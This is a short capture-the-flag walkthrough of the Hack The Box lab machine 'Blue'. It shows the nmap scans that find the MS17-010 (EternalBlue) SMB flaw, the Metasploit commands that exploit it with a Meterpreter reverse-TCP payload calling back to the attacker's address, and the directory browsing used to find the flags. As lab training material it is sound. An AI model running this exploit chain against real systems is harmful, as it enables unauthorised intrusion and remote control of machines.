Hack The Box(HTB)Blue -Walkthrough-

Hey guys!Today I’m going to write a walkthrough for Hack The Box.

The targeted machine is Blue.

Blue’s Info Card

When I saw the words “Blue” and “Windows”, it ring a bell.
Let’s proceed for the time being.

01-nmap

Run nmap to scan the machine.

#nmap -sV -sS -Pn -oN blueHTB blue.htb
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.16s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7–10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

It’s good to save it in hosts in advance.

#vi /etc/hosts
10.10.10.40 blue.htb

The scan result show that 139,445 ports are open.Investigate further for vulnerabilities.

#nmap --script vuln blue.htb 

part of the result

smb-vuln-ms17–010 is VULNERABLE.
The vulnerability is commonly known as “Eternal Blue”. So the name of this machine is also blue.
Eternal Blue became famous in 2017 when it was used by a ransomware called “WannaCry”. more details

02-msf

Attacks the discovered vulnerabilities.

# msfconsole
msf5 > search ms17-010

parts of the result

msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts blue.htb
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.41
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

The Meterpreter shell has started.
I didn’t understand how to use Meterpreter ,so I had a hard time.
I referred to this page.

meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../..

meterpreter > cd Users
meterpreter > dir

I found an administrator.
The flag was on eash user’s desktop.

Thank you for reading.